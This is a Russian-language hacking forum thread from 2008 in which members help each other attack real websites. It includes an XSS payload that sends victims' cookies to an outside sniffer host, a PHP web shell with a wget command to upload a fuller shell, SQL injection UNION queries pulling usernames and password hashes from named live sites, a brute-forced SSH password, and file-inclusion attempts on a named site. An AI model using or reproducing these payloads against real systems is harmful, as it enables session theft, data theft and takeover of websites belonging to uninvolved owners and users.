Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    Fuckel, изъяснись понятней и с примером.
     
  2. Fuckel

    Fuckel Banned

    Joined:
    16 Jan 2008
    Messages:
    274
    Likes Received:
    59
    Reputations:
    6
    вообщем, xss выполняется, но " и ' фильтруются, то есть перед ними ставится /. Но перевожу скрипт в форму hex, то скрипт не выполняется, тоесть он просто выводит его на странице. Может это из-за браузера? Без примера, тк не хочу расппространятся.
     
  3. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Code:
    <script src=script.js></script>
     
  4. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    попробуй обратный апостроф `some text`
     
  5. -slow-

    -slow- Member

    Joined:
    15 Jan 2008
    Messages:
    24
    Likes Received:
    5
    Reputations:
    0
    установил снифер на нэтсек.ру...как сделать, чтобы через ссылку печеньки на него шли?и вобще это возможно?напишите примерный вид ссылки
     
  6. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    -slow-,
    Сначала найди xss'ку на нужном тебе сайте
    А потом ссылка вида:
    www.site.ru/index.php?id=<script>img=new Image();img.src="http://www.s.netsec.ru/pic.gif?"+document.cookie;</script>
     
    #906 0nep@t0p, 9 Feb 2008
    Last edited: 9 Feb 2008
    2 people like this.
  7. -slow-

    -slow- Member

    Joined:
    15 Jan 2008
    Messages:
    24
    Likes Received:
    5
    Reputations:
    0
    все таки без него нельзя....а что должно вывести, если есть узвимость, когда я поле проверяю на нее
     
  8. .acme

    .acme Elder - Старейшина

    Joined:
    8 Nov 2007
    Messages:
    126
    Likes Received:
    36
    Reputations:
    4
    PHP:
    <script>img = new Image(); img.src "http://s.netsec.ru/yo.gif?"+document.cookie;</script>
     
  9. Girsoft

    Girsoft New Member

    Joined:
    22 Jan 2007
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    ребя та, есть шелл на сайте такого вида: <? system($_get[cmd]) ?> но там лиункс стоит. какой коммандой мне закачать нормальный шелл? права на записть есть
     
  10. Macro

    Macro Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    552
    Likes Received:
    298
    Reputations:
    207
    wget хттп://нормальный_шелл.пхп -o куда_сохранить
     
  11. PSYho

    PSYho New Member

    Joined:
    1 Feb 2008
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    У меня есть пароль, что дальше? Help!!!

    HELP!!!!!!!! :eek: :eek: Я добыл брутом пароль.Через Putty почему-то его не могу ввести. Признаюсь я в хаке полнейший ламос. Как не через Putty ввести пароль? Помогите!!!
     
  12. Macro

    Macro Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    552
    Likes Received:
    298
    Reputations:
    207
    Пароль к чему ты добыл? К ssh?
     
  13. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Народ, очень интересует- можно узнать с помощью лимита имена колонок типа юзер пассворд в базе таблице? Таблицы узнал,а подобрать пассы не могу =((((подобрал только ид и имя юзера))
     
  14. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Причём тут лимит? Лимит всего лишь ограничивает/распределяет вывод данных. Если версия базы ниже пятой (насколько я догадался мускуль), то смотри форму авторизации. Значения name, 80% что совпадут с названием колонок.
     
  15. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    http://www.sitecom/showcategory.php?cid=7+union+select+0,column_name,2,3,4+from+site_users.columns+/*

    Доступа через селект туда нету,к information_schema.tables есть.

    Просмотрел имена таблиц через лимит,напарываюсь на site_users.Там почти 5к юзеров. Подобрал user_id и username, а пароли никак )(.
     
  16. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Форму авторизации не нашёл,только админку =(
     
  17. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Кто тебя учил таким запросам? Купи книгу по sql
    select column_name from information_schema.columns where table_name = blablabla limit 1,1
     
  18. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    http://housefind.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt, 7,8,9,10+from+runcms_users+where+uid=2

    Эммм...ктонить может объяснить по порядку,как оно сделано о_О ? А то я нириально туплю(первый раз ваапще такое встречаю):Р.Как в таком случае узнать кол.-во строк и таблиц? ) (Можно подробно).Когда я ордер пробую он выдаёт предупреждение )(
     
  19. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Тот вариант тоже прокатывал, ток я почему-то не угадал user_password, ибо к мускулу доступа не было)(
     
  20. ZET36

    ZET36 Elder - Старейшина

    Joined:
    8 Oct 2007
    Messages:
    250
    Likes Received:
    49
    Reputations:
    0
    Извените за банальный тупой вопрос по пхп инклюдингу. прочол статью по этой теме на античате

    вот нашол плохую фильтрацию
    http://www.dosuga.net/index.php?type=pic&seq=dfdsfds&mk=on&num=4&tot=92
    (уязвима переменная seq)

    пробывал подставить в переменную сайт

    http://www.dosuga.net/index.php?type=pic&seq=http://www.google.ru&mk=on&num=4&tot=92
    ноль эмоций

    пробывал разработать как локальный инклюд
    http://www.dosuga.net/index.php?type=pic&seq=../index.php&mk=on&num=4&tot=92

    тоже ничего
    подскажите в чом я ошибся и как разрабатывать эту уязвимость?
     
    #920 ZET36, 10 Feb 2008
    Last edited: 10 Feb 2008
    1 person likes this.
Thread Status:
Not open for further replies.